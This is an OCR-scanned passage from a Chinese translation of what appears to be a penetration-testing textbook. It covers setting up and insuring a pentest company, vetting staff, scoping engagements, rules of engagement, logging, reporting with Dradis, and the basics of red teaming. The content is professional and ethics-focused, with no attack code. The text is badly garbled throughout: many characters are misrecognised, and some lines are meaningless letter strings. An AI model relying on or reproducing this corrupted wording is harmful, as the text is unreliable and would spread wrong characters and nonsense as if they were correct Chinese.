两 种 业务 结构 ， 就 可 以 保护 自己 的 财产 ， 以 免 因 受到 业务 诉讼 而 破产 。 由 于 渗透 测 
试 回报 丰厚 ， 最 好 预 留 一 些 资 金 雇用 一 名 律师 和 一 名 会 计 ， 确 保 了 解 运营 S 型 公司 
或 有 限 公 司 的 门道 和 限制 条 件 。 
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2. 保险 


应 当 购买 保险 ， 原 因 有 多 个 方面 。 首 先 ， 由 于 灰 帽 黑客 在 安全 业务 上 投入 了 大 
量 时 间 和 金钱， 就 必须 考虑 保护 业务 。 其 次 ， 在 经 营 中 经 第 会 发 现 ， 业 务 合作 伙伴 
和 和 客户 已 为 与 他 们 做 生意 的 供应 商 设 是 了 保险 类 型 和 保险 范围 的 最 低 门 杭 。 此 时 ， 
需要 与 一 位 保险 中 介 沟 过 ， 请 保险 中 介 指 导 安 全 公司 完成 投保 过 程 ， 这 里 提供 的 信 
因 可 作为 与 保险 中 介 交 流 时 的 一 般 性 建议 。 此 外 ， 可 能 考虑 买 几 份 保险 ， 建 议 购 买 
绪 合 贡 任 险 保护 整体 业务 。 技 术 错 误 和 琶 漏 (E&O) 是 一 种 关键 保险 ， 在 犯错 和 遗漏 
一 些 事 情 时 ， 这 类 保险 将 会 发 挥 作用 。 如 有 可 能 ， 不 妨 买 一 份 网 络 保险 。 安 全 公司 
更 容易 成 为 攻击 者 的 目标 ， 如 采 万 一 成 为 受害 者 ， 网 络 保险 也 能 起 到 保护 组 织 的 
作用 。 


3. 降低 运营 风险 


对 所 有 从 事由 任意 环境 获取 机 密 信 息 的 人 员 ， 都 应 当 进 行 犯 非 育 景 调 查 。 与 其 
他 行业 相 比 ， 道 德 黑 客 领域 的 “ 坏 羊 末 ” 更 多 。 安 全 公司 党 理 层 的 重要 责任 之 一 古 
确保 团队 成 员 部 是 道德 黑客 ， 有 判断 力 ， 思 想 成 熟 ， 不 会 将 安全 公司 的 客户 置 于 人 危 
险 境 地 。 执 行 犯罪 至 景 调 枉 包括 在 本 地 和 国家 数据 库 进 行 搜 索 ， 一 丝 不 本 地 三 看 证 
明 信 、 验 证 学 历 学 位 ， 并 同时 验证 过 去 的 车 事 经 验 。 一 定 要 坐 下 来 ， 伦 些 时 间 与 候 
选 团队 成 员 进 行 详细 沟通 : 黎 别 那些 目 相 元 慎 的 表述 以 及 失 准 之 处 ， 很 多 简历 都 是 
WEN. AREE EE. FARAR. 

制定 一 份 案 略 ， 以 保证 在 技术 环境 中 安全 地 操作 。 应 当 制 定 技术 性 、 和 审理 性 和 
物理 性 安全 各 上 略 以 及 物理 安全 控制 措施 ， 用 以 保护 客户 的 数据 。 即 使 是 小 团队 ， 也 
要 在 深 电 熟 夸 后 确定 一 个 绩 密 的 流程 ， 保 证 测试 工作 有 序 进 行 ， 降 低 风险 并 提高 
AUR 


6.22 ”成 为 一 名 值得 信赖 的 顾问 


客户 依赖 灰 幅 黑客 ， 布 望 灰 帆 黑 客 成 为 略 己 所 在 组 织 信任 的 专家 顾问 。 灰 幅 黑 
客 有 责任 为 客户 提出 中 上 育 的 建议 。 然 而 ， 由 于 经 向 受到 预算 限制 ， 客 尸 要 求 的 评 佑 
可 能 无 法 满足 法 律 法 规 要 求 ， 或 测试 范围 太 小 无 法 产生 真正 价值 。 灰 帆 黑 客 一 定 要 
避免 给 客户 一 种 错误 的 安全 感 。 多 人 花 一 些 时 间 ， 确 保 可 以 很 好 地 了 解 组 织 正 在 经 营 
的 主要 业务 。 客 户 组 织 的 领导 者 最 终 负 责 做 出 与 渗透 测试 相关 的 正确 决策 。 但 领 寻 
者 依 顿 于 安全 专家 提供 的 数据 和 建议 ， 来 指挥 团队 天 看 正确 的 方 同 前 进 。 

执行 渗透 测试 的 目的 是 获得 更 大 利益 。 测 试 活动 往往 是 复杂 的 、 艰 已 的 ， 需 要 
付出 大 量 努 力 、 解 决 大 量 问题 。 灰 帽 黑客 不 是 为 了 目 己 的 健康 才 做 这 件 事 ， 而 是 要 
保护 委托 痢 的 资产 。 为 了 提供 尽量 多 的 价值 ， 渗 透 测 试 团队 需要 了 解 和 定义 工作 的 


117 


118 


第 1 部 分 “从 业务 角度 分 析 黑 客 攻击 


具体 特点 、 持 续 时 间 、 频 率 和 范围 。 最 重要 的 是 ， 必 须 将 渗透 测试 团队 的 所 有 工作 
与 业务 影响 案 密 联系 在 一 起 ， 必 须 认 真 考 虑 测试 的 评估 结果 对 组 织 意 味 看 什么 。 

第 1 章 人 简要 介绍 过 渗透 测 斌 过程。 本章 对 这 些 主题 进行 了 扩展 ,并 与 组 织 的 有 具体 
情况 相 结 合 ， 以 便 为 组 织 提供 尽 可 能 多 的 价值 。 这 意味 看 选择 正确 的 方法 和 工具 ， 
并 优化 目 己 的 选择 ， 直 至 找到 一 个 解决 方案 ， 要 努力 退 求 实现 最 恰当 的 风险 控制 。 

组 织 至 少 要 每 年 执行 一 次 渗透 测试 ， 这 是 绝对 必要 的 。 对 大 多 数组 织 而 言 ， 这 
个 频率 还 是 不 能 满足 需要 ; 考虑 到 大 多 数 系 统 部 会 时 党 变化 和 更 新 ， 新 攻击 始终 部 
会 出 现 ， 每 年 执行 的 测试 次 数 应 当 多 于 一 次 。 许 多 强制 合 规 的 法 律 法 规 ( 例 如 ，PCI 
和 HIPAA) 只 要 求 每 年 执行 一 次 渗透 测试 ， 或 在 环境 友 生 重大 改变 后 执行 渗透 测试 ; 
此 交合 规 要 求 往往 是 模糊 不 清 的 ， 厅 烦 在 于 很 难 界 定 何 为 “重大 改变 (Significant 
Change)”， 而 且 法 律 法 规 没有 考虑 每 种 环境 的 独特 性 。 安 全 程序 疝 不 成 熟 的 组 织 会 
NMEA skim; 可 能 只 需要 初次 测试 就 能 确定 可 能 的 攻击 行为 ， 然 后 在 
执行 另 一 次 测试 前 构建 一 个 可 其 的 安全 计划 。 年 度 渗 透 测 试 通 彰 由 外 部 实体 执行 ， 
这 样 可 增加 测试 的 客观 性 。 

如 果 一 个 环境 具有 成 熟 的 安全 计划 ， 而 且 时 沼 变 化 ， 则 通 第 建议 频繁 地 进行 渗 
透 测试 。 进 行 季度 或 月 度 测 试 可 更 快 地 识别 和 修复 可 能 被 利 用 的 网 络 安全 问题 。 这 
样 ， 可 将 更 多 精力 投入 到 环境 或 安全 计划 的 菜 些 领域 ， 可 根据 组 织 的 目标 对 测试 进 
行 调整 。 例 如 ， 第 一 季度 专注 于 内 部 渗透 测试 ， 第 二 季度 专注 于 Web 应 用 程序 测试 ， 
第 三 季度 专注 于 测试 组 织 的 安全 啊 应 和 事故 啊 应 能 力 ， 第 四 季度 专注 于 社交 工程 攻 
击 (Social Engineering Attack，SEA) 测 试 。 办 公 地 点 分 散在 多 个 位 置 的 大 组 织 可 在 每 
个 季度 (如 有 必要 ， 可 以 更 频繁 ) 重 点 测试 不 同 地 点 。 如 有 果 由 内 部 员工 执行 季度 渗透 
测试 ， 则 通 第 有 必要 由 第 三 方 执行 年 度 渗 透 测 试 ， 以 保证 客观 性 。 

很 多 通过 收购 方式 来 成 长 的 实体 ， 会 在 并 购 (Merger and Acquisition, M&A 
程 中 加 入 渗透 测试 。 在 并 购 前 进行 的 渗透 测试 有 助 于 确定 实体 价格 ;并购 前 进行 的 
很 多 渗透 测试 会 发 现 很 多 问题 ， 为 解决 这 些 问 题 ， 可 能 需要 花费 数 白 万 闫 元。 并购 
后 进行 的 测试 可 帮助 组 织 理解 风险 有 多 大 ， 并 制定 计划 加 以 解决 。 使 用 渗透 测试 来 
换 示 不 同 网 络 整合 所 必须 省 理 的 风险 ， 可 以 为 组 织 提供 有 价值 的 信息 。 

制定 了 成 熟 安全 计划 的 实体 都 知道 ， 渗 透 测 试 提供 的 风险 信息 价值 很 襄 ， 并 且 
需要 持续 进行 。 一 些 此 类 实体 在 变更 党 理 计 划 中 融入 渗透 测试 和 安全 评 佑 活动， 要 
求 只 有 消除 了 因 泌 洞 或 非 授 权 访 问 造 成 的 潜在 风险 ， 才 允许 在 生产 环境 中 实施 新 的 
部 著 。 成 熟 的 软件 开发 组 织 经 第 实施 安全 软件 开发 生命 周期 (Secure Software 
Development Lifecycle，SSDLO) 尝 程 ，SSDLC 要 求 执 行 滩 透 测 试 ， 确 保 对 组 织 的 坏 
境 和 软件 风险 有 限 。 长 期 的 红 队 或 紫 队 演练 可 能 持续 半年 到 一 年 ， 使 组 织 可 详细 测 
试 应 急 啊 应 能 力 。 这 些 长 期 评估 退 常 包括 定期 会 议 、 月 度 或 季度 人 简 报 ， 以 便 为 组 织 
提供 意见 和 建议 。 


第 6 章 成 为 一 名 渗透 测试 人 员 


对 产品 进行 渗透 测试 时 ， 节 好 在 时 间 表 中 留 出 解决 “在 产品 发 布 表 及 现 的 任何 
问题 ”的 时 间 。 如 有 条 只 是 为 测试 分 配 了 时 间 ， 而 未 分 配 时 间 来 修复 测试 中 及 现 的 问 
题 ， 那 么 高 等 级 漏洞 或 关键 漏 洞 将 经 芝 性 地 导致 产品 延期 及 布 。 此 外 ， 发 布 重 大 更 
新 时 ， 也 应 当 执行 产品 渗透 测试 。 


6.2.3 ”管理 渗透 测试 


渗透 测试 的 管理 方式 与 其 他 技术 项 目 相 同 。 可 以 通过 合理 规划 和 民 好 沟通 来 降 
低 项 目 失败 风险 。1.2.1 节 “模拟 攻击 ”介绍 了 渗透 测试 的 一 些 基 础 知识 。 本 章 假 设 
灰 帆 黑客 和 新 人 们 已 经 了 解 这 些 基础 知识 ， 将 指引 学 习 新 方法 来 完善 和 优化 过 程 。 


1. 组 织 渗 透 测试 


执行 日 盒 或 灰 盒 评估 时 ， 首 先 要 对 环境 进行 全 面 了 解 或 部 分 了 解 。 灰 帽 黑客 通 
第 需要 进行 一 次 “数据 调 否 (Data Call)”， 来 收集 有 天 技术 环境 的 信息 。 最 好 预先 准 
备 一 系列 问题 ， 或 从 Intermet 上 选择 一 个 检查 表 。 收 集 有 关 人 员 、 了 下 地 址 范围 、 外 转 
系统 和 网 络 、 特 定 系统 和 目标 的 技术 详情 、 客 户 当 前 使 用 的 安全 控制 措施 等 。 如 果 
钓鱼 攻击 也 在 测试 范围 内 ， 则 执行 一 些 早 期 侦察 ， 提 前 提 区 一 份 清单 ( 列 出 电子 邮件 
目标 ) 以 供 审批 。 根 据 评 佑 的 内 容 确 定 要 提 哪 些 问题 ， 无 论 如 何 ， 要 养 成 太 早 沟通 、 
Ze 85 1538 B5] 24 fi o 

在 第 1 草 中 简要 地 提 到 了 各 方 理解 评估 范围 的 重要 性 。 一 份 详尽 的 工作 说 明 书 
(Statement of Work, SOW) 有 助 于 确保 不 存在 误解 。 始 终 要 用 文书 清晰 地 摘 述 评 佑 
的 性 质 和 范围 ;文书 可 以 是 合同 、 提 议 、 工 作 说 明 书 或 范围 申明 。 最 好 在 客户 签署 
的 文档 中 以 书面 形式 定义 范围 如果 评估 具有 物理 安全 组 件 , 一 定 要 有 市 谷 名 的 “ 免 
徘 金 牌 ”或 授权 书 。 如 有 果 客 户 的 保安 或 其 他 工作 人 员 与 渗透 测试 小 组 的 成 员 发 生 剖 
突 要 实施 扣留 ， 应 当 出 示 授 权 信 件 ， 以 化 解 敌对 局 面 。 授 权 信 件 要 指出 : 正在 进行 
渗透 测试 ， 信 件 中 的 评估 团队 名 单 成 员 有 权 执 行 测试 活动 。 授 权 信 件 中 应 当 列 出 联 
系 人 电话 号 码 ， 供 保安 打 电 话 核实 ;联系 人 通 前 是 客户 公司 的 现场 安全 或 网 络 安全 
负责 人 。 

应 该 安排 一 部 调度 电话 ， 同 时 召开 一 次 局 动 会 议 (Kick-o 全 Meeting)。 通 过 局 动 
会 议 ， 确 认 评 佑 的 范围 和 重点 ， 并 讨论 涉及 的 脆弱 系统 。 还 应 当 讨 论 各 个 步骤 。 灰 
帽 黑 洛 最 好 将 目 己 头脑 中 设想 的 钓鱼 活动 和 大 家 讨论 一 下 ， 和 争取 预先 获得 批准 。 分 
析 时 间 表 和 后 勤 供 给 ， 要 定义 一 些 里 程 个 时 间 点 ， 以 便 客 己 了 解 需要 准备 什么 ， 什 
么 时 候 需 要 。 后 勤 问 题 可 能 包括 : 获得 一 间 小 会 议 室 或 工作 场所 ， 申 请 获得 对 网 络 
端口 或 内 部 VLAN 的 访问 ， 获 取 物 理 访问 工作 证 和 停车 通行 证 。 灰 帽 黑客 很 有 可 能 需 
要 申请 在 夜间 上 锁 的 房间 内 工作 , 这样 就 可 以 在 内 部 测试 阶段 将 设备 留 在 客户 现场 。 

男 外 ， 对 大 多 数 短 期 渗透 测试 而 言 ， 要 避 倪 出 现 “ 猫 戏 老 眠 ”的 场景 ， 即 客户 
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竭力 阻止 测试 团队 发 动 的 攻击 。 但 有 些 评估 允许 防御 安全 团队 主动 保护 网 络 ， 从 而 
“演练 ”技能 。 不 管 是 哪 种 评估 类 型 ， 都 要 详细 讨论 “游戏 规则 CRules of 
Engagemenb”， 其 中 涉及 客户 的 “主动 防御 (Active Defense)”。 如 果 安 全 控制 措施 到 
位 ， 可 以 绥 减 或 完全 阻止 攻击 。 如 果 客 户 的 安全 控制 指 施 完备 且 有 效 ， 务 必要 在 报 
告 中 对 客户 提出 表扬 和 肯定 。 

处 理 “ 主 动 防御 ”有 一 个 极 好 、 极 简单 的 方法 。 在 渗透 测试 中 ， 如 有 果 控 制 撞 施 
生效 且 阻 挡 了 测试 进度 ， 可 以 要 求 客户 允许 测试 人 员 绕 违 通 过 ; 此 后 继续 测试 ， 
至 确保 已 经 测试 了 每 个 安全 层 ， 可 为 客户 提供 有 价值 的 信息 为 止 。 此 后 返回 ， 通 过 
目 己 努 力 ， 设 法 经 过 使 你 史 阻 的 初始 控制 (这 一 步 最 关键 )。 如 采 时 间 人 允许 ， 总 可 以 
用 这 样 或 那样 的 方式 绕 过 很 多 安全 控制 |。 

“游戏 规则 ”还 需要 确定 : 知 用 户 打 来 电话 ， 报 告 了 一 些 与 渗透 测试 相关 的 事 
项 ，IT 服 务 台 (Help Desi 的 最 佳 行 动 过 程 。 通 第 ， 最 好 只 回 极 少数 人 透露 目前 正在 
进行 渗透 测试 ， 因 此 IT 服 务 台 在 测试 之 初 并 不 知情 。 毕 竞 ， 在 渗 还 测试 期 间 ，IT 服 
台 是 频 莹 攻击 的 日 标 。 但 什么 事 都 要 学 会 权衡 。 评 估 期 间 开 服务 台 将 频 莹 介入 ， 
IT 服 务 台 应 当 可 以 适当 回应 用 户 查 询 和 用 户 报 告 。 理 想 情 况 下 ， 当 接收 到 事件 报告 
时 ，IT 服 务 台 将 开始 执行 “鉴别 和 分 级 程序 ”， 渗 透 测试 团队 开始 评估 用 尸 啊 应 。 

这 上 听 起 来 很 简单 ， 但 请 务必 与 客户 及 客户 团队 交换 联系 信息 。 可 能 需要 在 工作 
时 间 以 外 给 客户 打 电 话 ， 要 获得 手机 号 ， 确 认 下 班 后 与 谁 联 系 最 合适 。 有 时 ， 涂 透 
测试 人 员 会 在 客户 环境 中 及 现 入侵 指 标 (Cndicators of Compromise, IOC), XAN RER 
表示 已 发 生 了 攻击 成 功 事件 。 有 时 也 会 在 客户 的 外 围 环境 中 有 友 现 严重 漏 铜 。 这 些 情 
况 下 ， 最 好 立即 通知 客户 。 

在 渗透 测试 期 间 , 测试 工作 团队 需要 使 用 电子 邮件 来 传输 不 同类 型 的 敏感 信息 。 
最 好 准备 一 个 包含 加 密 和 多 因素 号 份 验证 机 制 的 安全 电子 邮件 系统 。 这 样 ， 当 发 送 
有 天 客户 人 员 或 环境 的 信息 时 ,或 将 渗透 测试 报告 友 给 客户 时 , 可 使 用 一 个 成 熟 的 、 
安全 的 信息 通道 。 


2. 执行 渗透 测试 


测试 工具 和 技术 数不胜数 ， 无 法 在 本 书 中 一 一 列 出 。 接 下 来 的 几 章 将 介绍 有 关 
攻击 技术 的 更 具体 信息 。 由 于 本 节 主 要 讨论 渗透 测试 人 员 的 职业 技能 ， 下 面 将 列 出 
一 些 观点 ， 帮 助 灰 帽 黑客 高 效 工 作 ， 更 完善 地 执行 渗透 测试 。 

与 其 他 人 合作 ， 并 利用 这 些 人 的 技能 和 经 验 总 是 有 价值 的 。 有 很 多 不 同 的 渗透 
测试 协作 工具 可 供 选 用 ， 从 而 可 以 方便 地 成 立 一 个 测试 团队 。 可 考虑 使 用 Armitage、 
Cobalt Strike 或 Faraday 等 协作 工具 ; 利用 这 些 工 具 ， 团队 成 员 可 保持 同步 ， 并 利用 可 
视 化 功能 来 促进 工作 。 

可 追 责 性 (Accountability) 是 十 分 重要 的 。 团 队 成 员 务必 在 自己 的 工具 和 设备 上 
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局 动 日 志 记 录 功 能 ， 这 样 可 对 自己 的 测试 活动 做 出 说 明 。 有 时 候 ， 客 户 环 境 可 能 站 
测试 团队 执行 渗透 测试 期 间 遇 到 各 式 各 样 的 问题 ， 客 户 想 要 了 解 这 是 不 是 由 测试 活 
动 造成 的 。 如 果 在 软件 和 测试 基础 架构 设备 上 正确 局 用 了 日 志 记 录 功 能 ， 就 可 以 准 
确 地 说 明 谁 在 什么 时 候 执行 了 什么 测试 活动 。 

渗透 测试 中 最 难 的 部 分 在 于 编写 报告 。 报 告 长 度 通常 至 少 60 页 。 一 份 优秀 报告 
包含 执行 概要 、 各 种 图 表 、 研 究 结果 汇总 等 ， 以 及 对 每 项 发 现 的 相应 结果 进行 详细 
介绍 。 每 项 发 现 都 应 当 有 证 据 和 补救 指南 。 另 外 ， 最 好 在 值得 表扬 之 处 对 客户 提出 
表扬 。 在 报告 中 添加 一 个 部 分 ， 来 描述 客户 的 当前 控制 状况 ， 以 确认 客户 的 安全 
成 果 。 

现在 讨论 如 何 生 成 报告 ， 探 讨 文 持 流程 和 技术 。 在 进行 渗透 测试 和 评估 的 每 一 
天 ， 测 试 团队 都 会 了 解 到 有 关 客 户 的 信息 。 务 必 将 所 了 解 到 的 内 容 记 录 为 “发 现 ” 
和 “好 的 发 现 ”。 如 果 攻 击 成 功 ， 那 么 报告 中 就 多 了 一 项 “发 现 ”。 如 果 攻 击 未 成 功 ， 
则 停顿 下 来 想 一 想 :“ 为 什么 攻击 未 能 成 功 ? 难 点 在 哪里 ? 是 否 该 因此 表扬 客户 ? ” 
然后 将 这 些 记 录 为 “好 的 发 现 ” 不 断 问 报告 中 添加 信息 和 发 现 。 将 头脑 中 的 新 鲜 细 
节 信 息 快 速记 录 下 来 。 每 天 收工 前 都 要 记录 和 分 析 研 究 结 果 。 如 果 将 报告 工作 全 部 
推 到 项 目 最 后 阶段 去 做 ， 这 将 是 一 个 极 难 的 苦 差 ， 最 好 一 边 做 工作 一 边 记录 。 

另外 ， 渗 透 测试 团队 可 很 好 地 利用 渗透 测试 报告 技术 。 渗 透 测试 报告 工具 集成 
或 添加 数据 库 系 统 , 以 帮助 灰 帆 黑客 创建 研究 结果 存储 库 。 测试 团队 往往 都 会 友 现 ， 
很 多 客户 的 研究 结果 都 是 类 似 的 ， 反 复写 下 相同 的 研究 结果 是 低 效 的 。 因 此 ， 每 次 
过 到 新 的 研究 结果 时 ， 务 必 进 行 审查 ， 此 后 存 入 研究 结果 数据 库 中 。 这 样 ， 下 次 必 
须 编写 研究 结果 时 ， 先 看 一 下 能 侣 利用 以 前 的 结果 。 有 多 种 早 越 的 渗透 测试 报告 工 
具 可 供 使 用 ， 包 括 久 经 考验 的 Dradis， 如 图 6-4 所 示 。Dradis 允 许 渗透 测试 人 员 创 建 
报告 模板 ， 从 已 输入 VulnDB 数 据 库 中 的 研究 结果 提取 信息 。 无 论 使 用 哪 种 工具 ， 务 
必 给 研究 结果 指定 风险 等 级 。 


Project summary 


Issues so far Project team 


10 
9 9 
ll. 0 
High Med Low Good Info 


Methodology progress 
Internet Explorer and Chrome Browser Hijacking via WPAD Auto- 


F6-4 将 Dradis 与 VulnDB 人 集成， 允许 对 渗透 测试 研究 结果 进行 分 类 ; 
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它 还 包含 项 目 官 理 功能 ， 以 帮助 你 跟 踊 整体 进度 


最 后 ， 在 渗透 测试 的 结束 阶段 指导 客户 完成 任何 收尾 活动 。 告 诉 客户 需要 重启 
哪些 计算 机 ， 如 果 测 试 人 员 创建 了 任何 账户 ， 务 必 告 诉 客户 删除 这 些 账 户 ， 另 外 ， 
将 对 环境 所 做 的 更 改 告知 客户 ， 以 便 客户 进行 适当 审查 或 禁用 。 也 需要 建立 一 个 数 
据 保留 期 限 ， 如 果 仅 将 环境 数据 保留 有 限 的 一 段 时 间 ， 对 客户 而 言 可 能 更 合适 ， 因 
此 ， 务 必 与 客户 讨论 数据 保留 和 销毁 策略 。 


6.3 本章 小 结 


本 章 讨 论 广泛 的 主题 ， 旨 在 帮助 想 从 事 渗透 测试 的 人 士 成 为 一 名 专家 级 渗透 测 
试 人 员 。 整 本 书 都 在 指导 新 人 要 完成 的 诸多 活动 ， 帮 助 新 人 成 长 为 一 名 高 手 。 本 章 
讨论 了 渗透 测试 精神 , 简单 回顾 了 历史 以 及 “黑客 宣言 ”。 可 以 经 由 多 种 不 同 途径 成 
为 一 名 合格 的 渗透 测试 人 员 ， 本 章 介绍 了 很 多 可 帮助 新 人 练习 和 巩固 技能 的 资源 
包括 培训 、 正 规 教 育 和 黑客 游戏 。 

讨论 了 如 何 完善 渗透 测试 技能 后 ， 又 讲述 了 如 何 完善 职业 技能 。 给 出 启动 一 家 
小 公司 的 指导 意见 ， 使 你 凭借 自己 的 能 力 赚钱 。 分 析 如 何 降低 法 律 风险 ， 同 时 优化 
运营 。 通 过 协作 和 报告 方式 与 其 他 人 合作 会 带 来 很 多 好 处 。 还 讨论 渗透 测试 人 员 或 
运营 渗透 测试 业务 需要 承担 的 职责 ， 这 包括 筛选 团队 成 员 、 进 行 合理 组 织 、 对 自己 
的 行为 做 出 说 明 以 及 完整 的 日 志 记录 。 成 为 一 名 受信 任 的 安全 顾问 意味 着 : 站 在 客 


户 利 苑 的 立场 ， 努 力 为 客 己 组织 提 供 合乎 着 德 的 建议 。 


S 7x: 红 队 的 行动 


“ 红 队 (Red Team)” 是 一 个 古老 的 概念 。 原 指 一 个 独立 团队 ， 从 敌 方 的 观点 执 
行 秘密 性 的 模拟 攻击 ， 目 的 在 于 触及 防御 方 部 闭 的 控制 措施 和 对 策 。 红 队 的 目标 是 
回 组 织 发 起 挑战 ， 促 使 组 织 极 大 地 提升 安全 程序 的 效率 。 红 队 广 泛 存 在 于 企业 界 、 
技术 领域 及 军事 领域 ， 实 际 上 ， 红 队 可 用 于 任何 使 用 攻防 控制 措施 的 环境 。 

^W B (Blue Team)” 的 成 员 是 网 络 防 御 者 ， 本 书 其 他 章节 将 介绍 览 队 。 从 前 面 
的 介绍 可 知 ， 蓝 队 的 任务 最 艰 已 ， 负 贡 保 护 组 织 的 资产 (Asset) 和 敏感 数据 (Sensitive 
Data)， 防 止 受 到 “ 红 队 ”和 真实 敌人 的 攻击 。 保 护 组 织 的 攻击 面 (Attack Surface) 是 
一 项 十 分 复杂 的 任务 。 蓝 队 也 并 非 被 动 地 坐 在 那里 等 待 迎接 政 方 的 攻击 ， 而 是 像 猪 
人 一 样 ， 主 动 寻找 威胁 ， 并 从 环境 中 清除 这 些 威胁 。 当 然 ， 有 些 监 队 活 动 并 不 像 搜 
过 威胁 那样 惊险 刺激 ;而 是 更 专注 于 检测 恶意 活动 ， 实 施 安 全 加 国 ， 并 维护 环境 的 
Ea TERE 


NS HER: 国外 的 红 队 概念 一 般 是 指 攻 击 方 ， 蓝 队 概念 是 防守 方 ， 这 与 国内 的 
\ 2 演习 分 配 恰 好 相反 。 


掉 德 黑客 的 目标 古 促 使 组 织 的 防御 体系 逐步 成 熟 。 道 德 黑 客 必须 了 解 对 立方 监 
队 的 观点 Perspective)， 以 便 为 臣 队 捉 供 最 有 价值 的 信息 。 本 重 进 一 步 介 绍 让 德 黑 客 
的 方法 论 ， 描 述 企 业 红 队 的 工作 ， 还 重点 指出 与 监 队 的 关键 接 触 点 ， 这 是 因为 ， 道 
fa A HI BES whe A ii te HME - 


本 章 介绍 的 主题 如 下 : 
红 队 的 行动 
红 队 的 目标 
第 见 问 题 

沟通 

理解 威胁 

攻击 框架 

红 队 测试 环境 
目 适 应 测试 
吸取 的 教训 
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7.1 红 队 的 基本 行动 


红 队 的 行动 与 其 他 道德 黑客 的 测试 活动 有 几 个 重要 区 别 。 首 先 ， 红 队 的 行动 是 
在 不 公开 的 情况 下 进行 的 测试 ， 红 队 测试 的 性 质 是 严格 傈 蜜 的 。 其 次 ， 由 于 测试 未 
经 公开 ， 因 此 监 队 在 啊 应 挑战 时 ， 与 啊 应 真正 的 安全 事件 是 一 样 的 。 红 队 的 行动 旨 
在 演示 啊 应 过 程 或 安全 控制 措施 的 不 足 之 处 。 总 体 而 言 ,“ 红 队 ” 概 念 可 帮助 组 织 在 
条 略 层面 、 行 动 层 面 和 战术 层面 走 同 成 熟 。 红 队 的 亮点 在 于 脱离 抽象 采用 车 事 演习 
手段 ， 人 允许 防御 者 在 战术 层级 练习 啊 应 挑战 。 

“ 红 队 ”有 很 多 定义 。 美 国 国防 部 指令 DoDD 8570.1 给 出 的 定义 是 :“ 跨 学 科 地 
模拟 政 方 完成 的 独立 的 、 有 音 点 的 威胁 活动 ， 则 在 公开 和 发 现 漏 洞 ， 改 善信 息 安 全 
行业 的 态势 ”美国 军事 联合 出 版 物 1-16 给 出 的 定义 是 :“ 决 策 文 持 要 系 ， 提 供 独 
的 能 力 ， 以 便 在 计划 、 作 战 和 情报 分 析 中 元 分 探索 普 代 方案 。” 这 两 个 定义 部 强 调 : 
只 有 达到 一 定 的 独立 性 和 客观 性 级 别 ， 才 能 成 功 地 履行 红 队 职 贡 。 

红 队 在 履行 工作 职员 时 ， 人 往往 首先 定义 一 个 特定 目标 以 及 约定 的 规则 。 红 队 专 
注 于 访问 、 盗 取 真 实数 据 或 没有 实际 价值 的 标记 (Token)。 红 队 也 可 专门 攻击 测试 环 
境 、QA 环 境 或 真实 生产 环境 。 无论 如 何 ， 目标 是 了 解 如 何 完善 组 织 的 检测 、 啊 应 和 
恢复 活动 。 通 第 而 言 ， 当 专业 人 员 讨论 应 急 啊 应 时 ， 重 点 是 改进 以 下 指标 : 

e 平均 检测 时 间 (Mean Time to Detect, MTTD) 

e 平均 啊 应 时 间 (Mean Time to Respond, MTTR) 

e 平均 根除 时 间 (Mean Time to Eradicate, MTTE) 


“根除 ” “Shl 33 “修正 ” 
“根除 (Eradication)” 指 在 演练 后 数 年 内 都 可 能 没有 完成 整改 ， 具 体 取决 于 故障 
的 性 质 、 根 本 原因 分 析 (RCA) 结 有 果 以 及 汲取 教训 后 司 动 项 目的 坚决 程度 。“ 吉 制 


(Containment)” 指 将 攻击 的 影响 限制 在 可 观察 参数 的 可 接受 范围 。 “修正 
(Remediation)” 指 大 幅 降低 攻击 者 在 环境 中 的 攻击 能 力 ， 有 时 采取 临时 缓解 措施 ， 以 
防止 攻击 者 使 用 同一 攻击 行为 进一步 发 起 攻击 ， 
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空 施 红 队 演 练 的 主要 好 处 是 : 能 够 衡量 和 报告 上 述 指 标 ， 从 而 专注 于 提高 安全 
团队 的 敏捷 性 (Agility)。 
7.1.1 策略、 行动 和 战术 重点 

红 队 应 当 专 注 于 提高 组 织 在 策略 、 行 动 和 战术 层级 的 啊 应 能 力 。 如 果 组 织 只 关 


注 技术 应 蕊 啊 应 者 的 有 反应 ,将 失去 确保 所 有 决 倘 制定 者 部 参与 车 事 演习 的 绝 住 机 会 。 
组 织 的 执行 定理 层 、 技 术 经 理 、 法 务 部 门 、 公 共 关 系 团队 、 风 险 定 理 团 队 和 合 规 团 
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队 都 可 以 在 参加 红 队 演练 的 过 程 中 获 敬 。 


7.1.2 评估 比较 


下 面 将 讨论 红 队 演练 与 其 他 的 基于 技术 的 评估 (Technical-based Assessment) Hy 
不 同 之 处 。 


1. 漏洞 评估 (Vulnerability Assessment) 


漏洞 评估 巡 向 使 用 工具 扫 插 整个 环境 内 部 的 漏 将 ， 并 在 漏洞 评估 过 程 中 对 漏洞 
进行 验证 。 但 是 ， 漏 洞 评 佑 无 法 说 明 : 如 采 在 目标 攻击 中 组 合 使 用 环境 中 的 多 个 漏 
洞 ， 所 产生 的 结果 会 对 业务 产生 什么 影响 。 汤 洞 评估 也 未 说 明 坏 境 中 缺少 安全 控制 
指 施 的 影响 。 漏 洞 评估 十 分 午 要 ， 应 当 定 期 执行 ， 在 大 多 数 环 境 中 ， 每 月 执行 一 次 ; 
还 要 相应 地 执行 渗透 测试 ， 完 成 红 队 或 紫 队 演练 。 


2. 渗透 测试 (Penetration Test) 


如 果 要 演示 在 映 少 安全 控制 指 施 时 (以 及 攻击 者 组 合 使 用 技术 环境 中 的 多 个 现 
有 漏洞 时 )， 业 务 会 受到 什么 样 的 影响 ， 则 可 以 执行 渗透 测试 。 渗 透 测 试 的 目标 是 越 
权 访 问 , 并 演示 所 友 现 问题 造成 的 业务 影 啊 ,一 些 渗透 测试 还 有 一 个 渗 汤 (Exfiltration) 
组 件 ， 用 以 演示 删除 环 卉 中 的 数据 的 难 易 程度 。 大 多 数 渗 透 测试 都 不 允许 焉 队 啊 应 
攻击 ， 仅 在 渗透 测试 小 组 触 上 友 警 报时 进行 记录 。 出 于 合 规 的 目的 ， 通 香 要 求 执行 渗 
Min, 渗透 测试 也 可 以 给 组 织 提供 有 价值 的 信息 。 如果 组 织 刚 开始 完善 安全 程序 ， 
还 没有 对 红 队 演练 和 紫 队 壮 练 做 好 准备 ， 执 行 渗透 测试 也 是 很 合适 的 。 涂 透 测 试 通 
前 是 针对 条 个 时 间 扣 进行 评 信 ， 不 能 反映 锌 测试 组 件 的 日 第 特征 。 企 业 渗透 测试 通 
意 包 括 社区 工程 评估 和 物理 安全 评 佑 ， 这 部 分 内 容 和 后 讨论 。 


3. 红 队 (Red Teaming) 


